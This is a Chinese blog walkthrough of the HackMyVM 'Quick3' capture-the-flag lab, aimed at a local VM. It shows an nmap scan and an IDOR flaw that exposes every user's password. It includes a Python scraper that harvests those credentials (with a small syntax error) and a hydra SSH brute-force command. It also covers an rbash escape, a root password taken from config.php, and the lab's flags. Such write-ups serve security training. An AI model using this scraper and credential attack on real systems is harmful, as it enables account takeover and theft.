Quick3 - hackmyvm

已于 2024-02-20 20:14:48 修改
阅读量352 收藏 6
点赞数 6
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux
于 2024-02-20 20:13:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/136197889
版权

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3

本地环境

虚拟机:vitual box

靶场IP(quick3):192.168.56.105

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

小型靶场,nmap跑一下全端口即可

nmap -p 1-65535 -T4 -A -v 192.168.56.105

image-20240220170813671

确定目标位22端口和80端口

http服务

这次网页和以往的不太一样。不存在LFI,路径爆破也没有有价值的东西。

image-20240220181621464

点击主页右上角的"make appointment",即可进入一个登陆界面。随便注册个号进入。

image-20240220181734753

点击右上角的"My Profile"进入个人页面

image-20240220181828741

在"Change Password"选项中发现可以直接获取密码

image-20240220182059261

因为URL的形式是/customer/user.php?id=29,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了

image-20240220182343619

用这种方式可以获取所有用户的密码。简单写个爬虫收集信息:

import requests
from bs4 import BeautifulSoup as bs
from tqdm import tqdm

def getHTMLText(url,header= {'User-Agent': 'Mozilla/5.0'}):
    r = requests.get(url,headers=header,timeout=30)
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    print ("URL地址为:", r.url)
    return r.text


url='http://192.168.56.105/customer/user.php'
ck = 'PHPSESSID=5um04uhc6a82h0udeb0a83li9r'
header = {'User-Agent': 'Mozilla/5.0','Connection': 'keep-alive','Cookie': ck}

username = []
passwd = []
mail = []
for i in tqdm(range(1,29)):
    urlt = url + "/?id=" + str(i)
    text = getHTMLText(urlt,header)
    soup = bs(text,'lxml')

    username.append(soup.find("div",class_="contact_inner").h3.text)
    passwd.append(soup.find('input',attrs={'id':'oldpassword'})['value'])

with open("res.txt","w") as f:
    for i in range(len(username)):
        f.write(username[i].split()[0].lower()+":"+passwd[i]"\n")

这里我专门针对用户名处理了一下,一般用户取名会用姓

image-20240220192523716

爆破ssh

这里我选择hydra

hydra -C ./res.txt 192.168.56.105 ssh

image-20240220192833502

登录,用户目录下拿到user.txt

HMV{717f274ee66f8541a3031f175f615e72}

提权

值得一提的是,现在默认的shell是rbash,也就是权限收到更多限制的shell。这里直接输入bash就能跳出rbash了。

image-20240220200256856

linpeas没能跑出能直接用的漏洞,再继续收集点信息,从config.php找到root密码

fastandquicktobefaster

image-20240220200651437

直接su,然后得到root.txt

HMV{f178761104e933f9341f13f64b38538a}

古明地核
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QuickLook-3.6.11.msi
06-09
QuickLook-3.6.11.msi
QuickLook-3.6.5.zip
03-17
QuickLook-3.6.5.zip 官网下载 https://github.com/QL-Win/QuickLook/releases
quick4 - hackmyvm
tanbinn的博客
06-09 264
hackmyvmquick4靶场
Quick3 - hackmyvm,2024年最新膜拜大佬
2401_83739529的博客
04-18 680
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~点击主页右上角的"make appointment",即可进入一个登陆界面。的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了。用这种方式可以获取所有用户的密码。
Quick3 - hackmyvm,2024年BATJ30套大厂网络安全经典高频面试题
m0_61330806的博客
04-06 835
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick3。
Quick2 - HackMyVM
tanbinn的博客
02-19 378
hackmyvmquick2靶场
Quick3 - hackmyvm网络安全布局优化之include、merge、ViewStub的使用
m0_60666921的博客
04-08 618
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!点击主页右上角的"make appointment",即可进入一个登陆界面。不存在LFI,路径爆破也没有有价值的东西。,尝试sql注入无果,然后随便改个id的值就进入其他人的界面了。用这种方式可以获取所有用户的密码。点击右上角的"My Profile"进入个人页面。print (“URL地址为:”, r.url)
Adria - hackmyvm
tanbinn的博客
03-03 950
hackmyvm的adria靶场
hackmyvmQuick2靶机
woshicainiao666的博客
04-23 462
发现文件包含漏洞(但不能访问日志文件),有用的用户名(不知道密码),返回页面,看看还有什么,没有注意到的点这里有一个联系方式,试试ssh连接,不行,然后我又使用hydra爆破了,没有成功不行,发现不了其他的漏洞,只能使用工具扫描。
[HackMyVM]靶场 Quick3
qq_34942239的博客
03-04 604
在myprofile里面发现可以修改密码,并且原密码只是单纯的被遮盖,在源码里可以看到。然后就是翻文件,在customer里面的配置文件里面有root的密码。发现shell是rbash,输入bash拿到正常shell。更关键的是,在url中修改id可以直接读取其他用户的密码。注册个账号进入1@qq.com/1。处理一下,用姓作为username。成功登录root拿到flag。ssh连接拿到user权限。总结:越权,爬虫,配置文件。开启了22 80 端口。爬虫爬一下用户名密码。
[HackMyVm] Quick
qq_34942239的博客
03-12 449
测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入。根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这。发现比前几个quick系列多出来了employee目录。字段就dump了几条没发现有用的东西,密码也登不上。但是登录界面可以用万能密码登上去。home目录下有user.txt。添加一个GIF的文件头上传成功。前面的数字试到2找到了文件位置。sqlmap跑一下请求包。上传一句话木马时候提示。在查看进程的时候发现。
electron-quick-start-master 快速入门教程
05-31
electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程...
quickfix-1.15.1-cp38-cp38-win32
08-19
quickfix-1.15.1-cp38-cp38-win32
quick-lint-js:quick-lint-js发现JavaScript程序中的错误
04-12
quick-lint-js quick-lint-js发现JavaScript程序中的错误。 警告:这是预发行软件。 quick-lint-js正在积极开发中,并且不稳定。 使用风险自负。 quick-lint-js发现许多错误,包括: 使用不存在的变量分配给const...
MVC 框架安全
A526847的博客
06-17 560
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
安全Linux Fanotify使用入门
最新发布
追寻梦想的青春
06-19 462
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
智慧守护 畅游无忧——北斗应急呼叫柱,为景区安全加码
广州磐钴智能的博客
06-13 1079
智能部署,全面覆盖。
Java应用中文件上传安全性分析与安全实践
喔的嘛呀的博客
06-12 1139
这些措施涵盖了文件路径、文件权限、目录结构、Web服务器配置等多个方面,为开发人员提供了一套全面的指南,以确保文件上传功能不仅方便实用,而且具备较高的安全性。在现代Web应用程序中,数据上传是一个普遍存在的需求,然而,随之而来的是对上传数据安全性的担忧。通过检查文件的扩展名或使用浏览器提供的API验证文件的类型,可以在文件上传之前排除不安全的文件。在Web服务器的配置中,确保上传目录是禁止目录浏览的。客户端与服务端的数据验证是确保上传数据安全性的重要步骤,可以通过一系列验证手段来防范潜在的安全威胁。
quicklook-3.6.11.msi
07-15
### 回答3: quicklook-3.6.11.msi是一个Windows安装程序,用于安装QuickLook软件的版本3.6.11。QuickLook是一个轻量级的文件预览工具,可以在不打开文件的情况下快速查看文件的内容。该软件支持预览多种文件类型,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值